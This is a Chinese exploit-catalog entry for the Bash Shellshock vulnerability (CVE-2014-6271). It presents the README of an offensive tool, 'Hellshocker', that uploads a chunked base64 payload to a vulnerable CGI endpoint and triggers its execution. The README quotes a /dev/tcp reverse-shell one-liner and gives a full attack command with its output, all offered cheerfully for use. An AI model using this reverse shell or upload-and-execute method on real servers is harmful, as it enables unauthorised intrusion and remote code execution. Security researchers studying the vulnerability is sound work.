POC详情: 372ca7d0a73d24c1bc5c8f2cbf61ff8b81942a9d

来源
关联漏洞
标题: GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
描述
Shellshock exploitation script that is able to upload and RCE using any vector due to its versatility.
介绍
# Hellshocker 0.1.1

## Tool to exploit Shellshock vulnerability

Tired of using weak shellshock exploits or just "/bin/bash >& /dev/tcp/IP/port 0>&1" your way into the server?

Yes, you need to upload and execute something more complex to the server, and base64 encoding a huge file is impossible for your HTTP request to be accepted by the web-server.

Your problemas might be over with this tool. It is able to encode your payload into base64 and send it in chunks of (by default) 128 bytes to webserver and then, after it is sent, it decodes and gets executed.

"Wow", you say, "But I dont have PHP, I need something for Java."
No problem, I say, this tool is highly customizable.

Just look at this:

```bash
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.
```

Then your payload was successfully transferred and executed. Cool, isn't it?
Yeah, it is.
文件快照

[4.0K] /data/pocs/372ca7d0a73d24c1bc5c8f2cbf61ff8b81942a9d ├── [3.3K] hellshocker.py └── [1.8K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。